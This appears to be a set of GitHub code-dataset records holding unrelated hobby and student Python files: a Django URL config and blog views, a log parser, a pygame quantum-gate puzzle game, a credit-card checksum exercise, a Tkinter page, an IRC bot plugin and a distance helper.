url(r'^user_management/(?P[^/]+)/$',\n views.user_management_detail, name='user-management-detail'),\n url('^denied/$', views.denied, name='denied'),\n url('^404/$', views.denied, name='not_found'),\n url('', views.index, name='index'),\n]\n","repo_name":"praekeltfoundation/seed-control-interface","sub_path":"ci/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74001963346","text":"import json\nimport os\nfrom pathlib import Path\nimport logging\n\nFOLDER_NAME = \"OutputFiles\"\nFILE_NAME = \"Query_Execution_Summary.txt\"\n\n# Query_Execution_Summary category is defined within such lines. Bellow variable category_delimeter, is used to determine the start/end of the category.\ncategory_delimeter = 'INFO : ----------------------------------------------------------------------------------------------'\n\nclass Query_Execution_Summary:\n\n def __init__(self):\n self.seperator_indicator = 0\n # Creation of dictionary that will be passed in the output file\n self.Query_Execution_Summary_dictionary = {}\n\n def _get_file_location(self):\n script_path = os.path.abspath(__file__)\n script_dir = os.path.split(script_path)[0] # i.e. C:\\Users\\KompocholiG\\PycharmProjects\\Beeline\\InitiationFiles\n parent_of_script_dir = Path(script_dir).parent # i.e. C:\\Users\\KompocholiG\\PycharmProjects\\Beeline\n file_path = os.path.join(parent_of_script_dir, FOLDER_NAME, FILE_NAME)\n return file_path\n\n def _read_next_line(self, input_file):\n line = input_file.readline()\n return line\n\n # check if there are still metrics for Task_Execution_Summary by verifying lines are in between of separators [------] [------]\n def _not_end_of_metrics(self):\n if self.seperator_indicator < 2:\n return True\n else:\n return False\n\n # OPERATION DURATION metrics example -> ['Compile Query', '7.43s']\n def _get_key_and_value_from_metrics(self, line):\n # ignore \"INFO : \" from line and store the rest metrics in a str to use as keys and values for dictionary\n metrics = line.replace(\"INFO : \", \"\").split()\n key = ' '.join(metrics[0:len(metrics) - 1])\n value = metrics[-1]\n return key, value\n\n def _write_dictionary_to_file(self, Query_Execution_Summary_file):\n json.dump(self.Query_Execution_Summary_dictionary, Query_Execution_Summary_file, indent=2)\n\n def create_Query_Execution_Summary_text_file(self, input_file):\n\n file_path = self._get_file_location()\n #creation of output file Query_Execution_Summary.txt\n with open(file_path, 'w') as QES_file:\n # move to next line since 'INFO : OPERATION DURATION' line won't be used for creation of dictionary\n line = self._read_next_line(input_file)\n\n # as long as there are metrics in specific category (Query Execution Summary) keep parsing lines\n while self._not_end_of_metrics() is True:\n # If line is either the start or end of category logs, store it in the seperator_indicator indicator\n if category_delimeter in line:\n self.seperator_indicator += 1\n else:\n key, value = self._get_key_and_value_from_metrics(line)\n self.Query_Execution_Summary_dictionary[key] = value\n line = self._read_next_line(input_file)\n self._write_dictionary_to_file(QES_file)\n QES_file.close()\n logging.info(\"File Query_Execution_Summary.txt created successfully\")\n","repo_name":"GinaKompocholi/ParsingFile-3NewFilesOutput","sub_path":"InitiationFiles/Query_execution_summary_File_creation.py","file_name":"Query_execution_summary_File_creation.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14585665295","text":"#!/usr/bin/env python3\nimport pygame as pg\n\nimport numpy\nfrom collections import defaultdict, OrderedDict\nfrom math import copysign\nimport pytmx\nimport time\n\nfrom sprites import * # also has getfilepath\nfrom pyquil_requests import QThread\nfrom os import path\n\nDEBUG = False\nLEVELS = 3\n\n# define some colors (R, G, B)\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nDARKGREY = (40, 40, 40)\nLIGHTGREY = (100, 100, 100)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\nYELLOW = (255, 255, 0)\nPURPLE = (160,32,240)\n\n# game settings\nWIDTH = 1024 # 16 * 64 or 32 * 32 or 64 * 16\nHEIGHT = 768 # 16 * 48 or 32 * 24 or 64 * 12\nFPS = 60\nTITLE = \"quantum freeze block\"\nBGCOLOR = DARKGREY\n\n#define grid map\nTILESIZE = 64\nGRIDWIDTH = WIDTH / TILESIZE\nGRIDHEIGHT = HEIGHT / TILESIZE\n\n\n# used for signalling to the event loop that the results are back\nQVMRET = pg.event.Event(pg.USEREVENT, {})\n\n#Overall game class\nclass Game:\n\n def __init__(self, qthread, level=0):\n pg.init()\n self.qthread = qthread\n # self.qthread.start()\n #Set up screen\n self.screen = pg.display.set_mode((WIDTH, HEIGHT))\n pg.display.set_caption(TITLE)\n self.clock = pg.time.Clock()\n self.level = level\n\n self.load_data()\n self.lose = False\n background_image= pg.image.load(getfilepath('snow_scene.png'))\n\n\n #Load map file into folder\n def load_data(self):\n game_folder = path.dirname(__file__)\n self.map_data = []\n self.map = TiledMap(getfilepath('game_map{}.tmx'.format(self.level)))\n\n self.map_img = self.map.make_map()\n self.map_rect = self.map_img.get_rect()\n with open(path.join(game_folder, getfilepath('map{}.txt'.format(self.level))), 'rt') as f:\n for line in f:\n self.map_data.append(line)\n\n\n def game_intro(self):\n intro = True\n if DEBUG: print(\"loading bg\")\n background_image = pg.image.load(getfilepath('snow_scene.png'))\n if DEBUG: print(\"scale bg\")\n background_image = pg.transform.scale(background_image, (1200, 774))\n while intro:\n if DEBUG: print(\"blitting\")\n self.screen.blit(background_image, [-5, -5])\n\n if DEBUG: print(\"messages\")\n self.message_to_screen(\"The Quantum Freeze\",PURPLE,(WIDTH/2),(HEIGHT/2)-100,size=\"large\")\n self.message_to_screen(\"Press space to play\", BLACK, (WIDTH/2),(HEIGHT/2)+80)\n if DEBUG: print(\"wait for event\")\n for event in pg.event.get():\n if event.type == pg.QUIT:\n pg.quit()\n quit()\n if event.type == pg.KEYDOWN:\n if event.key ==pg.K_SPACE:\n intro = False\n\n pg.display.update()\n self.clock.tick(15)\n def game_instructions(self):\n instruct=True\n background_image = pg.image.load(getfilepath('snow_scene.png')).convert()\n background_image = pg.transform.scale(background_image, (1200, 774))\n while instruct:\n\n self.screen.blit(background_image,[-5,-5])\n self.message_to_screen(\"Instructions\",PURPLE,0,10,size=\"medium\",corner=\"left\")\n self.message_to_screen(\"The objective of the game is to guide your penguins\"\n , BLACK,0,150,corner=\"left\")\n self.message_to_screen(\"across the frozen lake to reach the igloos\", BLACK,0,190,corner=\"left\")\n self.message_to_screen(\"Every penguin must reach an igloo\", BLACK,0,290,corner=\"left\")\n self.message_to_screen(\"Every igloo must house at least one penguin\", BLACK,0,330,corner=\"left\")\n self.message_to_screen(\"BEWARE: the lake contains hidden holes!!!\", BLACK,0,430,corner=\"left\")\n self.message_to_screen(\"Press space to continue\", BLACK, WIDTH/2,HEIGHT/2+200)\n\n for event in pg.event.get():\n if event.type == pg.QUIT:\n pg.quit()\n quit()\n if event.type == pg.KEYDOWN:\n if event.key ==pg.K_SPACE:\n instruct = False\n\n pg.display.update()\n self.clock.tick(15)\n\n\n\n def message_to_screen(self,msg, color,pos_x,pos_y, size=\"small\",corner = \"center\"):\n if DEBUG: print(\"print msg, get text obj\")\n textSurf, textRect = self.text_objects(msg, color, size)\n if corner ==\"left\":\n textRect.x = pos_x\n textRect.y = pos_y\n else:\n textRect.center = pos_x,pos_y\n if DEBUG: print(\"blitting in msg_to_screen\")\n self.screen.blit(textSurf, textRect)\n\n def text_objects(self,text, color, size):\n if DEBUG: print(\"getting fornts\")\n smallerfont = pg.font.Font(getfilepath('Iceland-Regular.ttf'), 37)\n smallfont = pg.font.Font(getfilepath('Iceland-Regular.ttf'), 50)\n mederfont = pg.font.Font(getfilepath('Iceland-Regular.ttf'), 70)\n medfont = pg.font.Font(getfilepath('Iceland-Regular.ttf'), 100)\n largefont = pg.font.Font(getfilepath('Iceland-Regular.ttf'), 120)\n if size == \"smaller\":\n textSurface = smallerfont.render(text,True,color)\n elif size == \"small\":\n textSurface = smallfont.render(text, True, color)\n elif size == \"mediumer\":\n textSurface = mederfont.render(text, True, color)\n elif size == \"medium\":\n textSurface = medfont.render(text, True, color)\n elif size == \"large\":\n textSurface = largefont.render(text, True, color)\n return textSurface, textSurface.get_rect()\n # LOADING BAR DISPLAY FUNCTION\n def computing(self,dots):\n dots_progress = '.'*int(dots)\n self.message_to_screen(\"Computing\"+dots_progress, PURPLE, 8*TILESIZE+16,4*64+32,size=\"mediumer\", corner = \"left\")\n\n\n def new(self):\n\n # initialize all variables and do all the setup for a new game\n self.all_sprites = pg.sprite.Group()\n #3 distinct gate groups\n self.Igroup = pg.sprite.Group()\n self.Xgroup = pg.sprite.Group()\n self.Hgroup = pg.sprite.Group()\n # overall gate group controls drag and drop behaviour\n self.gate_group = pg.sprite.Group()\n # Gaps can be filled by gates\n self.gaps_group = pg.sprite.Group()\n self.all_qubits = pg.sprite.Group()\n # backgrounds will be tiles the penguin must stabd on\n self.backgrounds = pg.sprite.Group()\n # Penguin player group\n self.players = pg.sprite.Group()\n # igloos are endpoints\n self.igloos = pg.sprite.Group()\n self.wires = pg.sprite.Group()\n self.holes = pg.sprite.Group()\n\n self.circuit = Circuit()\n self.qubitsended = False\n self.inital_player_loc = None\n\n\n # Generate Sprites according to map entry\n itr=0\n for row, tiles in enumerate(self.map_data):\n for col, tile in enumerate(tiles):\n if tile == 'L':\n Hole(self, col, row)\n if tile == 'B':\n Background2(self, col, row)\n if tile == 'G':\n Background2(self,col,row)\n Igloo(self, col+0.25, row+0.25)\n if tile == 'P':\n #Background2(self,col,row)\n self.player_placeholder = Player(self, col+0.5, row-0.25) # move them to center of tile\n self.inital_player_loc = (col+0.5, row-0.25) # center of tile\n if tile == 'Q':\n Wire(self, col+0.5, row)\n qubit = Qubits(self, 1, col,row)\n\n if tile == 'I':\n self.Igate = Gates(self,\"I\",col,row)\n if tile == 'X':\n self.Xgate = Gates(self,\"X\",col,row)\n if tile == 'H':\n self.Hgate = Gates(self,\"H\",col,row)\n if tile == 'K':\n self.Hgate = Gates(self,\"K\",col,row)\n if tile == 'S':\n self.play_button = Play_button(self,col+0.25,row-0.25)\n if tile == 'W':\n Wire(self,col,row)\n if tile == 'A':\n gap = Gaps(self,col,row,itr)\n itr=itr+1\n if tile == 'C':\n circ(self,col,row)\n\n #for tile_object in self.map.tmxdata:\n # if tile_object.name == 'Lake':\n # print(tile_object.properties)\n # Background(self,tile_object.x,tile_object.y,tile_object.width,tile_object.height)\n\n\n\n\n def run(self):\n # game loop - set self.playing = False to end the game\n self.playing = True\n while self.playing:\n self.dt = self.clock.tick(FPS) / 1000\n self.events()\n self.update()\n self.draw()\n\n def quit(self):\n pg.quit()\n sys.exit()\n\n def update(self):\n # update portion of the game loop\n\n self.all_sprites.update()\n # Kill gate on contact\n\n\n\n\n for player in self.players: #define win and lose conditions\n hitIG = pg.sprite.spritecollide(player, self.igloos, False)\n onlake = pg.sprite.spritecollide(player, self.backgrounds, False)\n if onlake:\n player.on_lake = 0 # onlake must be 0 else the penguin dies\n else:\n player.off_lake = 1\n if hitIG:\n player.win = True #player wins when all penguins have winPe==1\n for igloo in hitIG:\n igloo.win = True\n else:\n player.win = False\n\n\n\n\n if self.qubitsended == False and all([q.end for q in self.all_qubits.sprites()]):\n self.qubitsended = True\n # do win condition detection. Only if all the qubits have just hit the end.\n correctIglos = [pg.sprite.spritecollide(igloo, self.players,False) for igloo in self.igloos]\n\n # move penguins closer to the destination.\n # move dx, dy each timestep - if pos = dest remove dest from list.\n qubit_list = self.all_qubits.sprites()\n for index, qubit in enumerate(qubit_list):\n if index > 0:\n prev_qubit = qubit_list[index - 1]\n if prev_qubit.end == 1 and qubit.end==0:\n qubit.speedx = 5\n\n velocity = 0.1\n step = [0]*len(qubit_list)\n for index,qubit in enumerate(qubit_list):\n hit = pg.sprite.spritecollide(qubit, self.gate_group, True)\n if hit:\n qubit.step +=1\n step[index]=qubit.step\n for i, player in enumerate(self.players.sprites()):\n if player.position_targets: # have a target to aim for\n if step[index]:\n # print(\"mov peng\", i, \"of\", len(self.players.sprites()))\n (tx, ty) = player.position_targets[index+1]\n\n if abs(player.x - tx) > 0.01:\n player.dx = copysign(velocity, tx - player.x)\n else:\n player.dx = 0\n\n if abs(player.y - ty) > 0.01:\n player.dy = copysign(velocity, ty - player.y)\n else:\n player.dy = 0\n\n\n if abs(player.x - tx) < 0.01 and abs(player.y - ty) < 0.01:\n qubit.step== 0\n\n\n\n\n\n def draw_grid(self):\n for x in range(0, WIDTH, TILESIZE):\n pg.draw.line(self.screen, LIGHTGREY, (x, 0), (x, HEIGHT))\n for y in range(0, HEIGHT, TILESIZE):\n pg.draw.line(self.screen, LIGHTGREY, (0, y), (WIDTH, y))\n\n def draw(self):\n self.screen.blit(self.map_img,[0,0])\n self.holes.draw(self.screen)\n self.all_sprites.draw(self.screen)\n self.all_qubits.draw(self.screen)\n\n self.message_to_screen(\"LEVEL\", PURPLE,190,560, \"medium\")\n self.message_to_screen(\"{}\".format(self.level),PURPLE,190,648,\"large\")\n self.message_to_screen(\"Click to select gate\",PURPLE,798,80,\"smaller\")\n self.message_to_screen(\"then click gap to move\",PURPLE,799,120,\"smaller\")\n self.message_to_screen(\"Hit play to run circuit\",PURPLE,798,160,\"smaller\")\n player_list = self.players.sprites()\n igloo_list = self.igloos.sprites()\n qubit_list = self.all_qubits.sprites()\n\n # LOADING BAR\n if self.player_placeholder.load:\n time_count = 0.3\n self.computing(self.player_placeholder.dots)\n self.player_placeholder.dots += 1\n if self.player_placeholder.dots ==4:\n self.player_placeholder.dots = 1\n time.sleep(time_count)\n for player in self.players:\n hit_hole = pg.sprite.spritecollide(player, self.holes, False)\n\n if hit_hole:\n # player.kill() eventually.\n for hole in hit_hole:\n self.wires.add(hole)\n if hole.hit == False:\n hole.hitting_time = pg.time.get_ticks()\n hole.hit= True\n\n now = pg.time.get_ticks()\n if now - hole.hitting_time>100:\n self.wires.draw(self.screen)\n if now - hole.hitting_time>950:\n self.play_again_lose()\n self.playing = False\n self.wires.draw(self.screen)\n if player.off_lake ==1:\n self.play_again_lose()\n self.lose = True\n if all( player.win is True for player in player_list) and all( igloo.win is True for igloo in igloo_list):\n if all( qubit.end is True for qubit in qubit_list):\n self.screen.fill(WHITE)\n self.play_again_win()\n elif all( qubit.end is True for qubit in qubit_list):\n self.lose = True\n self.play_again_lose()\n\n\n now = pg.time.get_ticks()\n if self.lose:\n time_count = 1\n time.sleep(time_count)\n self.playing = False\n\n\n pg.display.flip()\n\n def mesurement_callback(self, msmt_outcomes):\n print(\"sending event notification\")\n print(\"recv final states\", msmt_outcomes)\n self.msmt_outcomes = msmt_outcomes\n pg.event.post(QVMRET)\n\n def events(self):\n # catch all events here\n for event in pg.event.get():\n #print(\"got event of type\", event.type)\n if event.type == pg.QUIT:\n self.quit()\n if event.type == pg.MOUSEBUTTONDOWN:\n pos = pg.mouse.get_pos()\n\n if event.button == 1:\n\n # if click play set qubit moving and build up circuit\n if self.play_button.rect.collidepoint(pos):\n self.play_button.kill()\n self.player_placeholder.load +=1\n\n # call out to the bg thread to run the circuit\n #\n self.qthread.build_circuit(self.circuit.qubit_operation)\n try:\n self.qthread.execute(callback=self.mesurement_callback)\n except Exception as e:\n print(e)\n\n # control placement behaviour of the gates\n for gate in self.gate_group:\n now = pg.time.get_ticks()\n if gate.rect.collidepoint(pos) and gate.clicked==False:\n gate.clicked = True\n gate.click_time = now\n if gate.type == \"I\":\n gate.image = pg.image.load(getfilepath('Igate_pressed.png'))\n elif gate.type == \"X\":\n gate.image = pg.image.load(getfilepath('Xgate_pressed.png'))\n elif gate.type == \"H\":\n gate.image = pg.image.load(getfilepath('Hgate_pressed.png'))\n elif gate.type == \"K\":\n gate.image = pg.image.load(getfilepath('CXgate_pressed.png'))\n\n\n for gap in self.gaps_group:\n if gap.rect.collidepoint(pos) and gate.clicked == True:\n gate_start_x = gate.rect.x/TILESIZE\n gate_start_y = gate.rect.y/TILESIZE\n gate.clicked = False\n Gates(self,gate.type,gate_start_x,gate_start_y)\n gate_x = gap.rect.x/TILESIZE\n gate_y = gap.rect.y/TILESIZE\n Gates(self,gate.type,gate_x,gate_y)\n gate.kill()\n self.gate_group.draw(self.screen)\n\n\n #gate.clicked = False\n\n self.circuit.qubit_operation[gap.id]=gate.type\n gap.kill()\n if now-gate.click_time >10 and gate.clicked==True:\n gate.clicked=False\n Gates(self,gate.type,gate.x,gate.y)\n gate.kill()\n\n\n\n if event.type == QVMRET.type:\n self.player_placeholder.load = False\n \"\"\"Runs the main game loop - processes the quantum sample list\n from the QVM, and instructs the penguins etc to play out the results.\n \"\"\"\n self.player_placeholder.kill()\n qubit_list = self.all_qubits.sprites()\n for index,qubit in enumerate(qubit_list):\n if index == 0:\n qubit.speedx = 5\n else:\n prev_qubit=qubit_list[index-1]\n if prev_qubit.end==1:\n qubit.speedx = 5\n\n print(self.players)\n msmt_outcomes = self.msmt_outcomes # saved by the callback\n msmt_outcomes = [tuple(msmt) for msmt in msmt_outcomes]\n\n # x=set(x)\n # the defaultdict holds 0 in all key locations - we then\n # incriment each observed sample so we know the relative\n # amplitude for each penguin. relative final amp. the prefix\n # needs to be the sum of amps at that point.\n x = defaultdict(lambda: 0)\n for sample in msmt_outcomes:\n x[sample] += (1./len(msmt_outcomes))\n # move penguin according to mmt outcomes.\n #\n # test with only the first msmnt outcome\n self.players.empty()\n for pidx in range(len(x.keys())): # additional players\n Player(self, *self.inital_player_loc)\n print(\"no unique paths:\", len(self.players.sprites()))\n\n # need a list of steps.\n # [ [(x, y, weight)], [(x, y, weight), (x, y, weight)] ... ]\n\n # each element of this list is a map of locations -> amplitude for\n # the penguins after gate i.\n print(\"walking the penguins\")\n paths = [OrderedDict() for _ in range(len(msmt_outcomes[0]))]\n for path in paths:\n path[(0, 0)] = 1./len(msmt_outcomes)\n\n\n for pengidx, (path, weight) in enumerate(x.items()):\n px, py = 0, 0\n for step in path:\n if step == 1:\n px += 2\n else:\n py += 2\n paths[pengidx][(px, py)] = paths[pengidx].get((px, py), 0) + weight\n\n pathlists = [path.keys() for path in paths]\n print(\"penguin paths\", pathlists)\n for penguin, path in zip(self.players.sprites(), pathlists):\n penguin.add_target_walk(path)\n\n\n def show_start_screen(self):\n pass\n # if win display congrats and ask to play again\n def play_again_win(self):\n bigfont = pg.font.Font(getfilepath('Iceland-Regular.ttf'), 80)\n text = bigfont.render('Congrats!', 13, PURPLE)\n text2 = bigfont.render('Press space to continue', 13, PURPLE)\n textx = WIDTH / 2 - text.get_width() / 2\n texty = HEIGHT / 2 - text.get_height() / 2\n textx_size = text.get_width()\n texty_size = text.get_height()\n pg.draw.rect(self.screen, (255,255,255), ((textx - 5, texty - 5),(textx_size + 10, texty_size +10)))\n\n\n self.screen.blit(text, (WIDTH / 2 - text.get_width() / 2,\n\n -64+HEIGHT / 2 - text.get_height() / 2))\n self.screen.blit(text2, (WIDTH / 2 - text2.get_width() / 2,\n\n 100-64 + HEIGHT / 2 - text2.get_height() / 2))\n\n for event in pg.event.get():\n if event.type == pg.QUIT:\n pg.quit()\n quit()\n if event.type == pg.KEYDOWN:\n pos = pg.mouse.get_pos()\n if event.key ==pg.K_SPACE:\n g = Game(level=(self.level+1) % LEVELS, qthread=self.qthread)\n g.show_start_screen()\n while True:\n g.new()\n g.run()\n g.show_go_screen()\n # if lose repeat as above but display lose\n def play_again_lose(self):\n self.screen.fill(WHITE)\n bigfont = pg.font.Font(getfilepath('Iceland-Regular.ttf'), 80)\n text = bigfont.render('You lose!', 13, PURPLE)\n text2 = bigfont.render('Press space to play again', 13, PURPLE)\n textx = WIDTH / 2 - text.get_width() / 2\n texty = HEIGHT / 2 - text.get_height() / 2\n textx_size = text.get_width()\n texty_size = text.get_height()\n pg.draw.rect(self.screen, (255,255,255), ((textx - 5, texty - 5),(textx_size + 10, texty_size +10)))\n\n\n self.screen.blit(text, (WIDTH / 2 - text.get_width() / 2,\n\n -64 +HEIGHT / 2 - text.get_height() / 2))\n\n self.screen.blit(text2, (WIDTH / 2 - text2.get_width() / 2,100 -64 + HEIGHT / 2 - text2.get_height() / 2))\n\n for event in pg.event.get():\n for event in pg.event.get():\n if event.type == pg.QUIT:\n pg.quit()\n quit()\n if event.type == pg.KEYDOWN:\n pos = pg.mouse.get_pos()\n if event.key ==pg.K_SPACE:\n g = Game(qthread=self.qthread, level=self.level)\n g.show_start_screen()\n while True:\n g.new()\n g.run()\n g.show_go_screen()\n\n\n\n\n def show_go_screen(self):\n play_again=True\n while play_again:\n self.screen.fill(WHITE)\n bigfont = pg.font.Font(getfilepath('Iceland-Regular.ttf'), 80)\n text = bigfont.render('You lose!', 13, PURPLE)\n text2 = bigfont.render('Press space to play again', 13, PURPLE)\n textx = WIDTH / 2 - text.get_width() / 2\n texty = HEIGHT / 2 - text.get_height() / 2\n textx_size = text.get_width()\n texty_size = text.get_height()\n pg.draw.rect(self.screen, (255,255,255), ((textx - 5, texty - 5),(textx_size + 10, texty_size +10)))\n\n\n self.screen.blit(text, (WIDTH / 2 - text.get_width() / 2,\n\n -64+HEIGHT / 2 - text.get_height() / 2))\n self.screen.blit(text2, (WIDTH / 2 - text2.get_width() / 2,100-64 + HEIGHT / 2 - text2.get_height() / 2))\n\n pg.display.flip()\n\n for event in pg.event.get():\n if event.type == pg.QUIT:\n pg.quit()\n quit()\n if event.type == pg.KEYDOWN:\n pos = pg.mouse.get_pos()\n if event.key ==pg.K_SPACE:\n g = Game(qthread=self.qthread)\n g.show_start_screen()\n while True:\n g.new()\n g.run()\n g.show_go_screen()\n\ndef quit():\n sys.exit(0)\n\ntry:\n level_idx = sys.argv.index(\"-l\")+1\n level = int(sys.argv[level_idx])\nexcept ValueError:\n level = 0\n# create the game object\nprint(\"created game\")\nqthread = QThread()\nprint(\"startred game\")\n\nqthread.start()\ng = Game(qthread=qthread, level=level)\nprint(\"showing start screen\")\ng.show_start_screen()\n# # Game loop\nwhile True:\n try:\n g.game_intro()\n g.game_instructions()\n g.new()\n g.run()\n g.show_go_screen()\n except Exception as e:\n if DEBUG:\n raise e\n","repo_name":"riverlane/quantum-freeze","sub_path":"quantum-freeze.py","file_name":"quantum-freeze.py","file_ext":"py","file_size_in_byte":25858,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"71523330706","text":"#Rehan Javaid rj3dxu\r\ndef check (num):\r\n \"\"\"\r\n This purpose of this function is to determine whether or not an input represents a valid credit card number based on calculations\r\n :param num: Any positive integer\r\n :return: if the integer is less than 10 or the value obatined from the function's calculations is not divisble by 10, the function returns false\r\n otherwise the function will return true if the value obtained from the function's calculations is divisble by 10\r\n \"\"\"\r\n if num < 10:\r\n return False\r\n num = str(num)\r\n new_list = []\r\n for i in range(int(num[0]), int(num[-1])):\r\n a = 2*int(num[i])\r\n i+=2\r\n new_list.append(a)\r\n continue\r\n addition_multiply2 = sum(new_list)\r\n new_list2 = []\r\n for i in range(int(num[0]), int(num[-1])):\r\n b = int(num[i+1])\r\n i+=2\r\n new_list2.append(b)\r\n continue\r\n addition = sum(new_list2)\r\n test_value = addition + addition_multiply2\r\n if test_value % 10 == 0:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\n","repo_name":"rehanjavaid2001/CreditCardValidityCheck","sub_path":"credit_card.py","file_name":"credit_card.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38029300438","text":"from Tkinter import *\nimport ttk, login_util, WattTime_Util, Query, PageFive\n\nimport Tkinter as tk\n\nclass PageTwo(tk.Frame):\n\n def __init__(self, parent, controller):\n # global WattTime_Util.current_tariff\n tk.Frame.__init__(self, parent)\n label = tk.Label(self, text=\"Current Tariff\", font=WattTime_Util.LARGE_FONT)\n label.pack(pady=10,padx=10)\n\n sublabel = tk.Label(self, text=\"Your current tariff is \"+str(WattTime_Util.current_tariff), font=WattTime_Util.SMALL_FONT)\n sublabel.pack(pady=10,padx=10)\n\n button1 = tk.Button(self, text=\"Change Tariff\",\n command=lambda: controller.show_frame(PageFive.PageFive))\n button1.pack()\n\n button2 = tk.Button(self, text=\"Back to Home\",\n command=lambda: controller.show_frame(Query.Query))\n button2.pack()\n","repo_name":"sbilich/EDF_WattTime","sub_path":"PageTwo.py","file_name":"PageTwo.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27679025098","text":"import math\n\n\ndef get_spherical_distance(lat1, lon1, lat2, lon2):\n def rad(x):\n return x * math.pi / 180\n R = 6371e3\n fi1 = rad(lat1)\n fi2 = rad(lat2)\n delta_fi = rad(lat2-lat1)\n delta_lambda = rad(lon2-lon1)\n a = (math.sin(delta_fi / 2) ** 2) + \\\n math.cos(fi1) * math.cos(fi2) * \\\n (math.sin(delta_lambda / 2) ** 2)\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1-a))\n return R * c / 1000 # km\n","repo_name":"hatomist/admissions-queue","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9598394542","text":"from core import Plugin\nfrom sqlalchemy import create_engine, Table, Column, Integer, Unicode, MetaData, DateTime\nfrom sqlalchemy.orm import mapper, sessionmaker\nfrom datetime import datetime\nimport re\n\nclass Seen(Plugin):\n\n def __init__(self, factory):\n Plugin.__init__(self, factory)\n self.channel_message_rule = \".*?\"\n\n def on_channel_message(self, vtkbot, nick, nickmask, hostmask, channel, message, match):\n session = self.Session()\n occurrence = session.query(Occurrence).filter_by(user=nick).first()\n if not occurrence:\n occurrence = Occurrence(nick, channel, datetime.now())\n else:\n occurrence.datetime = datetime.now()\n session.save_or_update(occurrence)\n session.commit()\n match = re.match(\"%s: seen ([^\\s]*)\" % self.factory.nickname, message)\n if match:\n occurrence = session.query(Occurrence).filter_by(user=match.group(1)).first()\n if occurrence:\n vtkbot.send_channel_message(channel, \"Ik zag %s het laatst %s\" % (occurrence.user, occurrence.datetime))\n else:\n vtkbot.send_channel_message(channel, \"Ik heb %s nog nooit gezien!\" % match.group(1))\n\n def create_database_tables(self):\n metadata = MetaData()\n #Create SQL tables\n occurrence_table = Table('seen', metadata,\n Column('id', Integer, primary_key=True),\n Column('user', Unicode(length=35)),\n Column('channel', Unicode(length=100)),\n Column('datetime', DateTime),\n )\n mapper(Occurrence, occurrence_table)\n metadata.create_all(self.factory.engine)\n self.Session = sessionmaker(bind=self.factory.engine)\n\n def on_help(self, vtkbot, channel):\n vtkbot.send_channel_message(channel, \"Seen is handig als je wil weten wanneer een gebruiker laatst online was: '%s: seen Gebruiker'\" % self.factory.nickname)\n\nclass Occurrence(object):\n def __init__(self, user, channel, datetime):\n self.user = user\n self.channel = channel\n self.datetime = datetime\n\n def __repr__(self):\n return u'' % (self.user, self.channel, self.datetime)\n","repo_name":"Mathiasdm/VTKBot","sub_path":"plugins/seen.py","file_name":"seen.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"1061709192","text":"import datetime\n\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse, HttpResponseRedirect, HttpResponseForbidden\nfrom django.shortcuts import render, get_object_or_404\nfrom .models import Post, Category\nfrom django.contrib.auth import login, authenticate\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom .forms import NewUserForm\n\nfrom django.contrib.auth import login\nfrom django.contrib import messages\n\nfrom .forms import PostForm\nfrom .forms import EditForm\n\nfrom django.urls import reverse\nfrom django.template import loader\n\n\n# Create your views here.\ndef index(request):\n post_list = Post.objects.order_by('-pub_date')[:20]\n categories_list = Category.objects.all()\n context = {\n 'post_list': post_list,\n 'categories_list': categories_list,\n }\n return render(request, 'blog/index.html', context)\n\n\ndef post(request, post_id):\n post = get_object_or_404(Post, pk=post_id)\n context = {\n 'post': post,\n }\n return render(request, 'blog/post.html', context)\ndef category_posts(request, category_id):\n category = Category.objects.filter(id=category_id)[0]\n posts = Post.objects.filter(category = category_id)\n categories_list = Category.objects.all()\n context = {\n 'post_list': posts,\n 'category':category,\n 'categories_list':categories_list,\n }\n return render(request, 'blog/category_posts.html', context)\n\ndef register_request(request):\n if request.method == \"POST\":\n form = NewUserForm(request.POST)\n if form.is_valid():\n user = form.save()\n login(request, user)\n messages.success(request, \"Registration successful\")\n return redirect(\"blog:index\")\n messages.error(request, \"Unsuccessful registration.\")\n form = NewUserForm()\n return render(request=request, template_name=\"blog/register.html\", context={\"register_form\": form})\n\n\ndef login_request(request):\n if request.method == \"POST\":\n form = AuthenticationForm(request, data=request.POST)\n if form.is_valid():\n username = form.cleaned_data.get('username')\n password = form.cleaned_data.get('password')\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n messages.info(request, f\"You are now logged in as {username}.\")\n return redirect(\"blog:index\")\n else:\n messages.error(request, \"Invalid username or password.\")\n else:\n messages.error(request, \"Invalid username or password.\")\n form = AuthenticationForm()\n return render(request=request, template_name=\"blog/login.html\", context={\"login_form\": form})\n\n\ndef create_post(request):\n user = request.user\n if not user.is_authenticated:\n return redirect('blog:index')\n\n form = PostForm(request.POST or None, request.FILES or None)\n if form.is_valid():\n obj = form.save(commit=False)\n author = user\n obj.author = author\n obj.pub_date = datetime.datetime.now()\n\n obj.save()\n form = PostForm()\n context = {\n \"form\": form,\n }\n return render(request, \"blog/create_post.html\", context)\n\n\ndef edit_post(request, post_id=None):\n user = request.user\n if id:\n post = get_object_or_404(Post, pk=post_id)\n if post.author != request.user:\n return HttpResponseForbidden()\n else:\n post = Post(author=request.user)\n form = EditForm(request.POST or None, request.FILES or None, instance=post)\n if request.POST and form.is_valid():\n obj = form.save(commit=False)\n author = user\n obj.author = author\n obj.pub_date = datetime.datetime.now()\n obj.save()\n 